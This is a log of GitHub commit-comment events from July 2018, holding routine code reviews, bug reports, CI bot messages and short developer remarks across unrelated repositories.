{"id":"8021756110","type":"CommitCommentEvent","actor":{"login":"ZeroEpoch1969"},"repo":{"name":"TFPatches/TotalFreedomMod"},"payload":{"comment":{"id":29841600,"position":null,"line":null,"path":null,"commit_id":"575818ba691e42b3aabbee1b11d3205fb95b5528","created_at":"2018-07-26T10:12:26Z","updated_at":"2018-07-26T10:12:26Z","author_association":"MEMBER","body":"https://www.youtube.com/watch?v=GtkZi3blCps ***LONGBOI JOHNSON***"}},"created_at":"2018-07-26T10:12:26Z"}
{"id":"8021756126","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29841601,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T10:12:26Z","updated_at":"2018-07-26T10:12:26Z","author_association":"MEMBER","body":"Looking cool! Would you please also add empty space to the left and right sides for the post preview?\r\n\r\n![1](https://user-images.githubusercontent.com/32987666/43256459-6f4db8e4-90d5-11e8-8967-cbcd165b211a.png)\r\n\r\n![2](https://user-images.githubusercontent.com/32987666/43256478-7b1062ee-90d5-11e8-95bf-ad7e0b2970e0.png)\r\n\r\n"}},"created_at":"2018-07-26T10:12:26Z"}
{"id":"8021760524","type":"CommitCommentEvent","actor":{"login":"abias"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29841606,"position":12,"line":879,"path":"scss/post.scss","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-26T10:13:22Z","updated_at":"2018-07-26T10:13:22Z","author_association":"MEMBER","body":"This change wasn't there when you built the core contribution. Why is it needed here?"}},"created_at":"2018-07-26T10:13:22Z"}
{"id":"8021761713","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29841608,"position":75,"line":58,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-26T10:13:36Z","updated_at":"2018-07-26T10:13:36Z","author_association":"OWNER","body":"That leads to your implementation sir. Because when we write the tests actually we design the application. Ok, I'll do it in this way. I will try to guess how this implementation should be. I did a good thing by creating that inspiration branch because now I am sure it is a dead way."}},"created_at":"2018-07-26T10:13:36Z"}
{"id":"8021761956","type":"CommitCommentEvent","actor":{"login":"abias"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29841610,"position":7,"line":184,"path":"lang/en/theme_boost_campus.php","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-26T10:13:38Z","updated_at":"2018-07-26T10:13:38Z","author_association":"MEMBER","body":"Typo: scrolloable"}},"created_at":"2018-07-26T10:13:38Z"}
{"id":"8021762624","type":"CommitCommentEvent","actor":{"login":"feruzm"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29841612,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T10:13:46Z","updated_at":"2018-07-26T10:13:46Z","author_association":"MEMBER","body":"Great 👍 \r\nYes and can we remove `¶` characters from diff markdown, better for viewing?"}},"created_at":"2018-07-26T10:13:46Z"}
{"id":"8021765116","type":"CommitCommentEvent","actor":{"login":"XVilka"},"repo":{"name":"radare/radare2"},"payload":{"comment":{"id":29841616,"position":null,"line":null,"path":null,"commit_id":"911f22149a5793cb90779e30bd29694dbbd2af11","created_at":"2018-07-26T10:14:17Z","updated_at":"2018-07-26T10:14:17Z","author_association":"COLLABORATOR","body":"@sivaramaaa please check this, how it can be beneficial for the GSoC task."}},"created_at":"2018-07-26T10:14:17Z"}
{"id":"8021768309","type":"CommitCommentEvent","actor":{"login":"diyautospec"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29841619,"position":null,"line":null,"path":null,"commit_id":"44bd29fc844cdb21b879144fda4dbb94c4afcd2c","created_at":"2018-07-26T10:14:54Z","updated_at":"2018-07-26T10:14:54Z","author_association":"NONE","body":"my setup is really basic, i just have a simple 3 line BOM, no tracking no routes... create new MO, start production, some lines will report 0 consumed instead of the correct qty, you can manually enter numbers in to qty consumed field when you save, returns to 0.  i looked in the PG table and the correct qty is \"stored\" but its not retrieved. if you mark as done, the lines with 0 will not be consumed properly.\r\n\r\nif you contact me directly justin@diyautospec.com ... i can give you access to my dev box so to show you exactly what is happening."}},"created_at":"2018-07-26T10:14:54Z"}
{"id":"8021768687","type":"CommitCommentEvent","actor":{"login":"SHANTH2013"},"repo":{"name":"QualitySoftwareServicesInc/java"},"payload":{"comment":{"id":29841621,"position":1,"line":1,"path":"README.md","commit_id":"e114428214da0406579470c3f91c01652bbd4756","created_at":"2018-07-26T10:14:59Z","updated_at":"2018-07-26T10:14:59Z","author_association":"CONTRIBUTOR","body":"public class Hello {\r\n  public static void main(String[]args){\r\n    System.out.println(\"Hello World!\")\r\n    \r\n    int myFirstNuber = (10 + 5) + (2*10);\r\n    int mySecondNumber = 12;\r\n    int myThirdNumber = myFirstNumber * 2;\r\n    \r\n    int myTotal = myFirstNumber + mySecondNumber + myThiredNumber;\r\n    \r\n    System.out.println(myNewTotal);\r\n    }\r\n}\r\n\r\n/** How would you define a new variable\r\n  * that had a difference\r\n  * between 1,000 and the current value\r\n  * of 'myTotal'\r\n*/"}},"created_at":"2018-07-26T10:14:59Z"}
{"id":"8021773786","type":"CommitCommentEvent","actor":{"login":"abias"},"repo":{"name":"moodleuulm/moodle-theme_boost_campus"},"payload":{"comment":{"id":29841642,"position":20,"line":429,"path":"classes/output/core_renderer.php","commit_id":"0d2c964dfbfaa264004fc58679c695f71b2a5050","created_at":"2018-07-26T10:16:03Z","updated_at":"2018-07-26T10:16:03Z","author_association":"MEMBER","body":"Well, this if statement is also a modification of the original template. Basically, only line 421 is not modified."}},"created_at":"2018-07-26T10:16:03Z"}
{"id":"8021777852","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"boy0001/FastAsyncWorldedit"},"payload":{"comment":{"id":29841647,"position":null,"line":null,"path":null,"commit_id":"f5f13ddbe36e3d88ff3ff3caa5696b3ab0a9b2d5","created_at":"2018-07-26T10:16:55Z","updated_at":"2018-07-26T10:16:55Z","author_association":"NONE","body":"@boy0001 Build failed to compile."}},"created_at":"2018-07-26T10:16:55Z"}
{"id":"8021778091","type":"CommitCommentEvent","actor":{"login":"thevery"},"repo":{"name":"bipinvaylu/awesome-kotlin-native"},"payload":{"comment":{"id":29841648,"position":null,"line":null,"path":null,"commit_id":"18aa3e7f230f2a833ce6ba4b398164fd0b58f005","created_at":"2018-07-26T10:16:57Z","updated_at":"2018-07-26T10:16:57Z","author_association":"NONE","body":"https://github.com/Kotlin/kotlinx.coroutines/blob/develop/native/README.md"}},"created_at":"2018-07-26T10:16:57Z"}
{"id":"8021778767","type":"CommitCommentEvent","actor":{"login":"qwqzzzsx"},"repo":{"name":"qwqzzzsx/qwqtest"},"payload":{"comment":{"id":29841649,"position":1,"line":1,"path":"s.txt","commit_id":"492b6904e81e5ecd98d9b8973372fec753df784d","created_at":"2018-07-26T10:17:06Z","updated_at":"2018-07-26T10:17:06Z","author_association":"OWNER","body":"sdsdsdsdsdsds"}},"created_at":"2018-07-26T10:17:06Z"}
{"id":"8021778863","type":"CommitCommentEvent","actor":{"login":"AlexisDrogoul"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":29841650,"position":null,"line":null,"path":null,"commit_id":"461f8a697a30522d154a472ca6637fb137a0d0f7","created_at":"2018-07-26T10:17:07Z","updated_at":"2018-07-26T10:17:07Z","author_association":"MEMBER","body":"Good job ! It was probably the cause... 😄 "}},"created_at":"2018-07-26T10:17:07Z"}
{"id":"8021779285","type":"CommitCommentEvent","actor":{"login":"kroitor"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29841651,"position":null,"line":null,"path":null,"commit_id":"213130c8102fa17117210cba60f64edeb9b5afe1","created_at":"2018-07-26T10:17:12Z","updated_at":"2018-07-26T10:17:12Z","author_association":"MEMBER","body":"https://github.com/ccxt/ccxt/commit/75ddd555e13c778830b47e5effd8c015c8363a5c"}},"created_at":"2018-07-26T10:17:12Z"}
{"id":"8021784005","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29841664,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-26T10:18:09Z","updated_at":"2018-07-26T10:18:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T10:18:09Z"}
{"id":"8021784100","type":"CommitCommentEvent","actor":{"login":"Gimmon"},"repo":{"name":"Toludin/Healium"},"payload":{"comment":{"id":29841666,"position":null,"line":null,"path":null,"commit_id":"7b10790246130685d814a5f475fd466483835f58","created_at":"2018-07-26T10:18:10Z","updated_at":"2018-07-26T10:18:10Z","author_association":"NONE","body":"The fix seems to work good. Thanks. I suck at healing, you mod makes me much better\r\n"}},"created_at":"2018-07-26T10:18:10Z"}
{"id":"8021784129","type":"CommitCommentEvent","actor":{"login":"AlexisDrogoul"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":29841665,"position":null,"line":null,"path":null,"commit_id":"461f8a697a30522d154a472ca6637fb137a0d0f7","created_at":"2018-07-26T10:18:10Z","updated_at":"2018-07-26T10:18:10Z","author_association":"MEMBER","body":"And It's probably my fault, by the way. I think I accidentally deleted these two lines when adding streamex..."}},"created_at":"2018-07-26T10:18:10Z"}
{"id":"8021786489","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29841670,"position":75,"line":58,"path":"tests/TicTacToeTest.php","commit_id":"1fe8501de16f4b6fd3220c9d79a4190b04468162","created_at":"2018-07-26T10:18:39Z","updated_at":"2018-07-26T10:18:39Z","author_association":"NONE","body":"It leads to one testable implementation. There is enough room for creativity in the tests, for instance the parameter of the Map constructor."}},"created_at":"2018-07-26T10:18:39Z"}
{"id":"8021790405","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841677,"position":20,"line":20,"path":"lesson4/train.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:19:25Z","updated_at":"2018-07-26T10:19:25Z","author_association":"NONE","body":"поиск елемента массива лучше осуществлять с помощью встроенных средств языка Руби\r\nк примеру в модуле `Enumerable` (который включен в класс `Array`) есть метод [find](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-find)\r\n\r\nс его помощью поиск будет выглядеть так:\r\n```ruby\r\narray.find { |element| condition }\r\n```\r\nон вернет найденный объект или `nil`, если объект не найден"}},"created_at":"2018-07-26T10:19:25Z"}
{"id":"8021791386","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29841680,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-26T10:19:38Z","updated_at":"2018-07-26T10:19:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T10:19:38Z"}
{"id":"8021791813","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29841683,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-26T10:19:43Z","updated_at":"2018-07-26T10:19:43Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T10:19:43Z"}
{"id":"8021791848","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29841684,"position":null,"line":null,"path":null,"commit_id":"ea833d6c46f3dbc8f9a6b9e2201ba790868ce6c2","created_at":"2018-07-26T10:19:43Z","updated_at":"2018-07-26T10:19:43Z","author_association":"NONE","body":"158341011_Issue#6381 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (2400 of 2970 tests passed, 57 test warnings)\n\nMessages:\n\n * 627 tests had: EIO diffs.\n * 566 tests had: Table big diffs.\n * 1 test had: BND diffs.\n * 84 tests had: ESO big diffs.\n * 173 tests had: ESO small diffs.\n * 102 tests had: AUD diffs.\n * 39 tests had: MTR big diffs.\n * 106 tests had: MTR small diffs.\n * 19 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 73\n * Failed: 570\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea833d6c46f3dbc8f9a6b9e2201ba790868ce6c2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea833d6c46f3dbc8f9a6b9e2201ba790868ce6c2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.81%25-red.png)</a> \n"}},"created_at":"2018-07-26T10:19:43Z"}
{"id":"8021792613","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841686,"position":20,"line":20,"path":"lesson4/train.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:19:53Z","updated_at":"2018-07-26T10:19:53Z","author_association":"NONE","body":"НО!\r\nметод `Train.find` лучше сделать через хеш, т.е. хранить инстансы поездов в хеше, где номер поезда - это ключ, а значение - сам объект\r\nтогда поиск будет просто поиском по ключу и при этом будет очень эффективным, т.к. хеш заточен на эту операцию"}},"created_at":"2018-07-26T10:19:53Z"}
{"id":"8021793765","type":"CommitCommentEvent","actor":{"login":"sungmosong"},"repo":{"name":"ElectraJailbreak/electratools"},"payload":{"comment":{"id":29841691,"position":null,"line":null,"path":null,"commit_id":"149c75e7e1e078c5ec6b3ea066a6a8e70f641387","created_at":"2018-07-26T10:20:08Z","updated_at":"2018-07-26T10:20:08Z","author_association":"NONE","body":"Thank u"}},"created_at":"2018-07-26T10:20:08Z"}
{"id":"8021794685","type":"CommitCommentEvent","actor":{"login":"dmoksh-vfip"},"repo":{"name":"ssorte/hello_world"},"payload":{"comment":{"id":29841692,"position":null,"line":null,"path":null,"commit_id":"777ddf495868f7a8c1b6ec3c0ff7264f66e3610d","created_at":"2018-07-26T10:20:17Z","updated_at":"2018-07-26T10:20:17Z","author_association":"NONE","body":"how to use this repo and why"}},"created_at":"2018-07-26T10:20:17Z"}
{"id":"8021798566","type":"CommitCommentEvent","actor":{"login":"mkutny"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29841701,"position":null,"line":null,"path":null,"commit_id":"213130c8102fa17117210cba60f64edeb9b5afe1","created_at":"2018-07-26T10:21:06Z","updated_at":"2018-07-26T10:21:06Z","author_association":"CONTRIBUTOR","body":"I don't trade there, no worries.\r\n\r\nLooks like this library is a bargaining power, though :-0"}},"created_at":"2018-07-26T10:21:06Z"}
{"id":"8021799892","type":"CommitCommentEvent","actor":{"login":"tanji"},"repo":{"name":"signal18/replication-manager"},"payload":{"comment":{"id":29841705,"position":5,"line":5,"path":"graphite/og-rek/ogorek.go","commit_id":"f3dcf4b7875842cc1c5211543e361a8cde06ed74","created_at":"2018-07-26T10:21:21Z","updated_at":"2018-07-26T10:21:21Z","author_association":"COLLABORATOR","body":"It's not really in our habits to delay such fixes, so all copyright notices as well as the vendored og-rek are gone in 2.0 and 2.1 branches."}},"created_at":"2018-07-26T10:21:21Z"}
{"id":"8021839915","type":"CommitCommentEvent","actor":{"login":"andimik"},"repo":{"name":"AlbrechtL/welle.io"},"payload":{"comment":{"id":29841798,"position":null,"line":null,"path":null,"commit_id":"ed7c5e7a455f8d23047697fd42762167d1bca1af","created_at":"2018-07-26T10:29:35Z","updated_at":"2018-07-26T10:29:35Z","author_association":"CONTRIBUTOR","body":"All kind of supported formats? S8 U8 S16LE S16BE "}},"created_at":"2018-07-26T10:29:35Z"}
{"id":"8021840144","type":"CommitCommentEvent","actor":{"login":"talsim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29841799,"position":37,"line":47,"path":"BankManagement/BankManagement/fileUtils.c","commit_id":"60a687b9aea3e911d3e247a56537430757928dc5","created_at":"2018-07-26T10:29:38Z","updated_at":"2018-07-26T10:29:38Z","author_association":"OWNER","body":"Not working"}},"created_at":"2018-07-26T10:29:38Z"}
{"id":"8021842885","type":"CommitCommentEvent","actor":{"login":"astuter"},"repo":{"name":"BelledonneCommunications/linphone-android"},"payload":{"comment":{"id":29841808,"position":null,"line":null,"path":null,"commit_id":"2c62a0428609ca23ee065ab6ff9b2ce83d3479f1","created_at":"2018-07-26T10:30:14Z","updated_at":"2018-07-26T10:30:14Z","author_association":"CONTRIBUTOR","body":"Still crash is happening on Android Oreo. Below is crash log:\r\n\r\n```\r\nCaused by java.lang.NullPointerException: Attempt to invoke interface method 'void org.linphone.core.Core.addListener(org.linphone.core.CoreListener)' on a null object reference\r\n       at org.linphone.LinphoneService.onStartCommand(LinphoneService.java:322)\r\n       at android.app.ActivityThread.handleServiceArgs(ActivityThread.java:3474)\r\n       at android.app.ActivityThread.-wrap20(Unknown Source)\r\n       at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1692)\r\n       at android.os.Handler.dispatchMessage(Handler.java:106)\r\n       at android.os.Looper.loop(Looper.java:164)\r\n       at android.app.ActivityThread.main(ActivityThread.java:6494)\r\n       at java.lang.reflect.Method.invoke(Method.java)\r\n       at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:438)\r\n       at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:807)\r\n```"}},"created_at":"2018-07-26T10:30:14Z"}
{"id":"8021847062","type":"CommitCommentEvent","actor":{"login":"anselal"},"repo":{"name":"MeguMegu1978/antminer-monitor"},"payload":{"comment":{"id":29841813,"position":null,"line":null,"path":null,"commit_id":"f57c72f09fccd89c1014b3e39b30c63345c04d98","created_at":"2018-07-26T10:31:03Z","updated_at":"2018-07-26T10:31:03Z","author_association":"NONE","body":"Actually the Z9 mini has only 12 chips, 4 per board. The Z9 should actually have more since it has a higher hashrate.\r\nIn the official site of the Z9 they don't mention anything about the number of chips on the Z9\r\nhttps://shop.bitmain.com/product/detail?pid=00020180710164901333EGb4bPcY0681\r\n"}},"created_at":"2018-07-26T10:31:03Z"}
{"id":"8021847660","type":"CommitCommentEvent","actor":{"login":"mibby"},"repo":{"name":"CodeMC/HolographicDisplays"},"payload":{"comment":{"id":29841816,"position":null,"line":null,"path":null,"commit_id":"3a5aa2da3469fedf611e786694e0ca7a76847fef","created_at":"2018-07-26T10:31:09Z","updated_at":"2018-07-26T10:31:09Z","author_association":"NONE","body":"2) If it is outside the HD API, why does it break when changing HolographicDisplay plugins? \r\n\r\n@Niall7459 thoughts?"}},"created_at":"2018-07-26T10:31:09Z"}
{"id":"8021849089","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29841820,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-26T10:31:27Z","updated_at":"2018-07-26T10:31:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T10:31:27Z"}
{"id":"8021853113","type":"CommitCommentEvent","actor":{"login":"anselal"},"repo":{"name":"MeguMegu1978/antminer-monitor"},"payload":{"comment":{"id":29841826,"position":null,"line":null,"path":null,"commit_id":"f57c72f09fccd89c1014b3e39b30c63345c04d98","created_at":"2018-07-26T10:32:20Z","updated_at":"2018-07-26T10:32:20Z","author_association":"NONE","body":"Are you sure that the T9+ has 9 boards ?"}},"created_at":"2018-07-26T10:32:20Z"}
{"id":"8021856548","type":"CommitCommentEvent","actor":{"login":"solardiz"},"repo":{"name":"cryptozeny/cpuminer-mc-yespower"},"payload":{"comment":{"id":29841832,"position":11,"line":66,"path":"cpu-miner.c","commit_id":"aef30850518efc82feb6263779e1f3599c796ed7","created_at":"2018-07-26T10:33:06Z","updated_at":"2018-07-26T10:33:06Z","author_association":"NONE","body":"Other miners are going to use `yespower` to refer to yespower 1.0. Maybe this should use `yespower05` here. And it's weird that `yescrypt` is still offered while being the same thing (just different implementation), but that's up to you..."}},"created_at":"2018-07-26T10:33:06Z"}
{"id":"8021864422","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29841841,"position":null,"line":null,"path":null,"commit_id":"f5148483a009caed070287efcb0209ea4b79ece5","created_at":"2018-07-26T10:34:43Z","updated_at":"2018-07-26T10:34:43Z","author_association":"OWNER","body":"save method in mongoose insert a object into database"}},"created_at":"2018-07-26T10:34:43Z"}
{"id":"8021865138","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841843,"position":12,"line":12,"path":"lesson4/station.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:34:53Z","updated_at":"2018-07-26T10:34:53Z","author_association":"NONE","body":"здесь видимо не хватает вызова `register_instance`"}},"created_at":"2018-07-26T10:34:53Z"}
{"id":"8021866834","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29841846,"position":45,"line":89,"path":"README.md","commit_id":"68545aec347a05ce519bbfe73fa3e11a59212557","created_at":"2018-07-26T10:35:14Z","updated_at":"2018-07-26T10:35:14Z","author_association":"NONE","body":"Here `Get interrupt` is a bit confusing. Can you explain more?"}},"created_at":"2018-07-26T10:35:14Z"}
{"id":"8021871436","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841871,"position":2,"line":2,"path":"lesson4/modules/instance_counter.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:36:14Z","updated_at":"2018-07-26T10:36:14Z","author_association":"NONE","body":"ненужная пустая строка"}},"created_at":"2018-07-26T10:36:14Z"}
{"id":"8021877386","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29841884,"position":null,"line":null,"path":null,"commit_id":"3e46f7e5ba649b783c66415f298b76708ae0e699","created_at":"2018-07-26T10:37:33Z","updated_at":"2018-07-26T10:37:33Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-550](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-550).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-550-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-26T10:37:33Z"}
{"id":"8021878030","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29841886,"position":null,"line":null,"path":null,"commit_id":"53064c9a345a032995c1e3881ede90e1ec20f351","created_at":"2018-07-26T10:37:42Z","updated_at":"2018-07-26T10:37:42Z","author_association":"OWNER","body":"save method insert a object in database\r\nfind method read all of the objects from database"}},"created_at":"2018-07-26T10:37:42Z"}
{"id":"8021880377","type":"CommitCommentEvent","actor":{"login":"MBA1376"},"repo":{"name":"MBA1376/node-course-2-todo-api"},"payload":{"comment":{"id":29841890,"position":null,"line":null,"path":null,"commit_id":"53064c9a345a032995c1e3881ede90e1ec20f351","created_at":"2018-07-26T10:38:14Z","updated_at":"2018-07-26T10:38:14Z","author_association":"OWNER","body":"findOne method read one object from database"}},"created_at":"2018-07-26T10:38:14Z"}
{"id":"8021881304","type":"CommitCommentEvent","actor":{"login":"amitzur"},"repo":{"name":"reversim/reversim-summit-2018"},"payload":{"comment":{"id":29841891,"position":null,"line":null,"path":null,"commit_id":"fdef27bf4f78b82450f2fa90a847da1f67c76ee4","created_at":"2018-07-26T10:38:26Z","updated_at":"2018-07-26T10:38:26Z","author_association":"NONE","body":"actually `dev.js` runs nodemon programatically on server files only"}},"created_at":"2018-07-26T10:38:26Z"}
{"id":"8021882501","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841892,"position":10,"line":10,"path":"lesson4/modules/instance_counter.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:38:43Z","updated_at":"2018-07-26T10:38:43Z","author_association":"NONE","body":"здесь `self` не нужен\r\nвнутри инстанс-методов `self` по умолчанию, т.е. при вызове метода без использования слова `self` - текущий объект\r\n```ruby\r\ndef some_method\r\n  do_something\r\n  # подразумевается self.do_something, т.е. вызов метода на текущем объекте\r\nend\r\n```\r\nявно `self` пишется только в случае, если происходит присвоение через сеттер значения какой-либо инстанс переменной (делается это, чтобы не было двусмысленности, чтобы можно было легко различить - это присвоение значения локальной переменной или это обращение к сеттеру)\r\n```ruby\r\ndef some_method(some_attribute)\r\n  self.some_attribute = some_attribute # подразумевается @some_attribute = some_attribute\r\n  some_attribute = 5 # присвоение значения локальной переменной\r\n  do_something_else(some_attribute)\r\nend\r\n```"}},"created_at":"2018-07-26T10:38:43Z"}
{"id":"8021883796","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841894,"position":28,"line":28,"path":"lesson4/modules/instance_counter.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:39:02Z","updated_at":"2018-07-26T10:39:02Z","author_association":"NONE","body":"ненужная строка"}},"created_at":"2018-07-26T10:39:02Z"}
{"id":"8021885258","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29841895,"position":18,"line":18,"path":"lesson4/modules/instance_counter.rb","commit_id":"6cf567c95d0816b39e38f7ef2ae339a074e428db","created_at":"2018-07-26T10:39:22Z","updated_at":"2018-07-26T10:39:22Z","author_association":"NONE","body":"здесь надо отступы поправить"}},"created_at":"2018-07-26T10:39:22Z"}
